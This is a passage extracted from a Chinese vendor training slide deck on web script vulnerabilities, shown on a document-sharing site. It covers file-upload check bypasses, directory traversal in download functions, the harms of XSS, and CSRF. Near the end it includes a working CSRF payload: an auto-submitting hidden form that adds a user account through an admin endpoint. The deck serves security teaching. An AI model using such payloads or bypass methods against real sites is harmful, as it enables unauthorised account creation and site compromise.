Web脚本漏洞攻击技术_第1页
Web脚本漏洞攻击技术_第2页
Web脚本漏洞攻击技术_第3页
Web脚本漏洞攻击技术_第4页
Web脚本漏洞攻击技术_第5页
已阅读5页,还剩27页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

Web脚本漏洞攻击分析技术深信服科技-熊耀富SANGFORInc.

售前咨询:400-806-6868

B/S架构业务系统安全漏洞一览

Web服务器漏洞产生原因PHP网站:LINUX(WIN*)+APACHE+MYSQL+PHPASP(.Net)网站:WINDOWS+IIS+ACCESS(MSSQL)+ASP(.NET、C#)JSP网站:LINUX(UNINX)+TOMCAT+MYSQL(ORACLE)+JSP网站开发语言

基础知识学习

WEB服务器常见脚本漏洞类型

WEB服务器常见脚本漏洞类型

认识常见的web脚本层漏洞–上传漏洞上传功能上传漏洞PC-1文件上传过程-安全检测机制Web服务器客户端检测机制(javascript)

服务端检测机制(MIME类)服务端检测机制(目录路径)服务端检测机制(文件扩展名)服务端检测机制(文件内容检测)

认识常见的web脚本层漏洞–上传漏洞客户端(javascript检查)

认识常见的web脚本层漏洞–上传漏洞

认识常见的web脚本层漏洞–上传漏洞客户端(javascript检查)1、使用Burpsuite抓包工具抓不到流量;2、浏览选中待上传文件,尚未提交,即触发文件类型检测行为;3、查看源码一般可见onsubmit=“return

xx”

认识常见的web脚本层漏洞–上传漏洞服务端(MIME检查)

认识常见的web脚本层漏洞–上传漏洞服务端(目录路径检查)

认识常见的web脚本层漏洞–上传漏洞服务端(文件扩展名检查)

认识常见的web脚本层漏洞–上传漏洞服务端(文件内容检查)

认识常见的web脚本层漏洞–上传漏洞服务端(文件内容检查)

认识常见的web脚本层漏洞–上传漏洞服务端(文件内容检查)

认识常见的web脚本层漏洞–目录穿越漏洞下载功能

认识常见的web脚本层漏洞–目录穿越漏洞下载功能PC-1网站下载功能Web服务器Web服务器上的下载资源存放在哪?

认识常见的web脚本层漏洞–目录穿越漏洞下载功能实现原理方法一方法二方法三

认识常见的web脚本层漏洞-目录穿越漏洞下载功能实现原理运行down.php文件,运行该文件的时候,必然要把将要被下载的文件读入内存当中,这里通过fopen()函数完成该动作,现在文件已经在内存当中了,这是需要从内存当中读取文件,通过fread()函数完成该动作需要注意的。演示站点:36/test/download_vul/index.html

认识常见的web脚本层漏洞-

XSS跨站脚本漏洞这些常用功能都可能存在这种漏洞!!搜索框留言板富文本框

认识常见的web脚本层漏洞–

XSS跨站脚本漏洞XSS跨站脚本漏洞

认识常见的web脚本层漏洞–

XSS跨站脚本漏洞XSS跨站脚本漏洞

认识常见的web脚本层漏洞–

XSS跨站脚本漏洞XSS跨站脚本漏洞危害钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼JavaScript以监控目标网站的表单输入,甚至发起基于DHTML更高级的钓鱼攻击方式。网站挂马:跨站时利用IFrame嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上,或者弹出恶意网站窗口等方式都可以进行挂马攻击。身份盗用:Cookie是用户对于特定网站的身份验证标志,XSS可以盗取到用户的Cookie,从而利用该Cookie盗取用户对该网站的操作权限。如果一个网站管理员用户Cookie被窃取,将会对网站引发巨大的危害。盗取网站用户信息:当能够窃取到用户Cookie从而获取到用户身份使,攻击者可以获取到用户对网站的操作权限,从而查看用户隐私信息。垃圾信息发送:比如在SNS社区中,利用XSS漏洞借用被攻击者的身份发送大量的垃圾信息给特定的目标群。劫持用户Web行为:一些高级的XSS攻击甚至可以劫持用户的Web行为,监视用户的浏览历史,发送与接收的数据等等。XSS蠕虫:XSS蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施DDoS攻击等。

认识常见的web脚本层漏洞–

XSS跨站脚本漏洞XSS跨站脚本漏洞危害演示–身份盗用

认识常见的web脚本层漏洞XSS跨站脚本漏洞危害演示–网站挂马

认识常见的web脚本层漏洞–

CSRF漏洞

CSRF(Cross-siterequestforgery跨站请求伪造,也被称为“oneclickattack”或者sessionriding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。

认识常见的web脚本层漏洞–

CSRF漏洞

认识常见的web脚本层漏洞–

CSRF漏洞

认识常见的web脚本层漏洞–

CSRF漏洞<formaction="36:81/admin/KS.User.asp"method="post"><inputtype=hiddenname=GroupIDvalue=2><inputtype=hiddenname=lockedvalue=0><inputtype=hiddenname=UserNamevalue=piaox1><inputtype=hiddenname=Emailvalue=test@><inputtype=hiddenname=Passwordvalue=sangfor><inputtype=hiddenname=PwdConfirmvalue=sangfor><inputtype=hiddenname=Questionvalue=我的宠物名字?><inputtype=hiddenname=Answervalue=test><inputtype=hiddenname=ChargeTypevalue=1><inputtype=hiddenname=RealNamevalue=""><inputtype=hiddenname=HomeTelvalue=1234><inputtype=hiddenname=Provincevalue=广东省><inputtype=hiddenname=Cityvalue=清远市><inputtype=hiddenname=HomePagevalue=""><inputtype=hiddenname=Actionvalue=SaveAdd><inputtype=submitname=Submitvalue=确定添加></form><script>document.forms[0].submit();</script>更多漏洞信息,可参考资料SQL注入学习:/index.php/SQL_Injection_Prevention_Cheat_SheetXSS跨站脚本漏洞学习:/index.php/X

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论